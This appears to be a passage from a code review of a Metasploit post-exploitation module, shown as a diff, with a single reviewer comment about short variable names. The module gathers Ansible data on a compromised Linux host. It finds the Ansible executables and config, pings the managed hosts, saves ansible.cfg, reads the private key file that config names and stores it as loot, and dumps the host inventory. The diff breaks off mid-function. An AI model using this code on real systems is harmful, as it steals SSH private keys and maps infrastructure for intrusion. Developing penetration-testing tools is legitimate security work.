modules/post/linux/gather/ansible.rb

```diff
@@ -0,0 +1,135 @@
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('ANSIBLE', [true, 'Ansible executable location', '']),
+        OptString.new('ANSIBLEINVENTORY', [true, 'Ansible-inventory executable location', '']),
+        OptString.new('ANSIBLECFG', [true, 'Ansible config file location', '']),
+        OptString.new('HOSTS', [ true, 'Which ansible hosts to target', 'all' ]),
+      ], self.class
+    )
+  end
+
+  def ansible_exe
+    return @ansible if @ansible
+
+    ['/usr/local/bin/ansible', datastore['ANSIBLE']].each do |exec|
+      next unless file?(exec)
+      next unless executable?(exec)
+
+      @ansible = exec
+    end
+    @ansible
+  end
+
+  def ansible_inventory
+    return @ansible_inv if @ansible_inv
+
+    ['/usr/local/bin/ansible-inventory', datastore['ANSIBLEINVENTORY']].each do |exec|
+      next unless file?(exec)
+      next unless executable?(exec)
+
+      @ansible_inv = exec
+    end
+    @ansible_inv
+  end
+
+  def ansible_cfg
+    return @ansible_cfg if @ansible_cfg
+
+    ['/etc/ansible/ansible.cfg', datastore['ANSIBLECFG']].each do |f|
+      next unless file?(f)
+
+      @ansible_cfg = f
+    end
+    @ansible_cfg
+  end
+
+  def ping_hosts
+    results = cmd_exec("#{ansible_exe} #{datastore['HOSTS']} -m ping -o")
+    l = store_loot('ansible.ping', 'text/plain', session, results, 'ansible.ping', 'Ansible ping status')
+    print_good("Stored pings to: #{l}")
+    columns = ['Host', 'Status', 'Ping', 'Changed']
+    table = Rex::Text::Table.new('Header' => 'Ansible Pings', 'Indent' => 1, 'Columns' => columns)
+    # here's a regex with test: https://rubular.com/r/FMHhWx8QlVnidA
+    regex = /(\S+)\s+\|\s+([A-Z]+)\s+=>\s+({.+})$/
+    matches = results.scan(regex)
+
+    matches.each do |match|
+      match[2] = JSON.parse(match[2])
+      table << [match[0], match[1], match[2]['ping'], match[2]['changed']]
+    end
+    print_good(table.to_s) unless table.rows.empty?
+  end
+
+  def conf
+    return unless file?(ansible_cfg)
+
+    f = read_file(ansible_cfg)
+    l = store_loot('ansible.cfg', 'text/plain', session, f, 'ansible.cfg', 'Ansible config file')
+    print_good("Stored config to: #{l}")
+    f.lines.each do |line|
+      next unless line.start_with?('private_key_file')
+
+      file = line.split(' = ')[1].strip
+      print_good("Private key file location: #{file}")
+      next unless file?(file)
+
+      key = read_file(file)
+      l = store_loot('ansible.private.key', 'text/plain', session, key, 'private.key', 'Ansible private key')
+      print_good("Stored private key file to: #{l}")
+    end
+  end
+
+  def hosts_list
+    hosts = cmd_exec("#{ansible_inventory} --list")
+    hosts = JSON.parse(hosts)
+    l = store_loot('ansible.inventory', 'application/json', session, hosts, 'ansible_inventory.json', 'Ansible inventory')
```

Comment:
same comment on single-char variable names, especially ones that could be `l` or `1`